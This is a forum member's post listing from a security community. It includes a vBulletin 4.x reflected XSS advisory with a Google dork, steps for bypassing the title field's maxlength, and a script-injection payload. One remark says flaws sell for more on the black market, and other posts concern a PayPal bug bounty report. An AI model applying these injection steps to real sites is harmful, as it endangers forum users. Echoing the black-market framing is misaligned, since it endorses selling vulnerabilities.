
sensi

Active Members
  • Posts

    574
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by sensi

  1. That one is in New Topic, if you noticed; if it's old, the communities where I found it should have fixed it before I reported it ;)).
  2. After receiving several messages, I decided to publish the vulnerabilities I found in vBulletin; some may be happy about it, others not. This being my first exploit, I hope you like it. I say we spread the exploit and give RST a bit of publicity.

     ##########################################################################################
     # -#-#- vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities -#-#-
     # -#-#- RSTforums.com -#-#-
     #
     # • Exploit Title: vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities - Reflected
     # • Google Dork: "Powered by vBulletin® Version 4.x.x"
     # • Date: 13.08.2013
     # • Exploit Author: Sensi
     # • Website: RSTforums.com
     # • Software Link: http://vbulletin.com/
     # • Version: vBulletin 4.x.x
     # • Tested on: Linux & Windows
     # • Special thanks to: Kalash1337 (https://rstforums.com/forum/members/kalash1337/)
     #
     ##########################################################################################
     #
     # ### First XSS ###
     #
     # Step 1: Go to -> Any post -> Press Editpost (advanced editor) -> Inspect 'title' element source and delete maxlength="85"
     # (Direct Link:) http://localhost/[path]/editpost.php?p=[post number]&do=editpost
     #
     # Step 2: Add a malicious vector on title element.
     # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script>
     #
     #________________________________________________________________________________________
     #========================================================================================
     #----------------------------------------------------------------------------------------
     #
     # ### Second XSS ###
     #
     # Step 1: Go to -> Any thread -> Press post new reply (advanced editor) -> Inspect 'title' element source and delete maxlength="85"
     # (Direct Link:) http://localhost/[path]/newreply.php?p=[post number]&noquote=1
     #
     # Step 2: Add a malicious vector on title element.
     # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script>
     ##########################################################################################
     #
     # Author will not be responsible for any damage caused! User assumes all responsibility.
     #
     ##########################################################################################
  3. I'll add: if you really have nothing else to do, you can also post tutorials, exploits, tools, or help new members.
  4. sensi

    Image upload

    IceImg: http://iceimg.com/i/3a/7f/466ad36fd9.jpg - Direct link
  5. Many happy returns!
  6. Congratulations! It's never too late.
  7. With my first persistent XSS you'll see me on the black market. I don't want to encourage this, but that's the truth: on the black market you make a lot more.
  8. First of all, I want to apologize for the double post!

     Hello ---------, (I want to point out that they didn't even spell my name correctly)
     Thank you for participating in the PayPal Bug Bounty Program. We regret to inform you that your bug submission was not eligible for a bounty as this bug was already discovered by another researcher.
     Title: [Cross-Site-Scripting] www.paypal.com
     UID: yx1175uS
     Thank you for your participation. We take pride in keeping PayPal the safer place for online payment.
     Thank you, PayPal Security Team

     The XSS was something similar to the one I found here, so slim chances that someone else found it... SCREW PAYPAL!
  9. Thanks, guys!
  10. Yes, I was logged and thanks.
  11. Theoretically I should receive $750
  12. Thank you!
  13. - Exploit: Paypal.com - Cross Site Scripting
      - Author: sensi
      - Browser: Firefox 23.0
      - Status: Reported!
      - P.o.C:
      Error:
  14. They offer it to you for free, and you still complain. Facepalm!
  15. ksfajk aksjfkla
  16. Welcome, enjoy your stay! https://www.youtube.com/watch?v=a4I_2GxrQPM
  17. sensi

    Fun stuff

  18. Likewise
  19. I'd need one too, if there's still room ...
  20. Happy birthday! By the way, how old did you turn?
  21. @The Time, what version of Chrome are you using?
  22. View image: madar facar
  23. @TheTime, are you 100% sure? @Zatarra, not everyone does things for a reward; maybe some want to learn/practice. @Sweby, if you can't do the challenge, you don't have to start insulting the guy. P.S.: I'll do it in 30 minutes. He sold me a filter like this one too.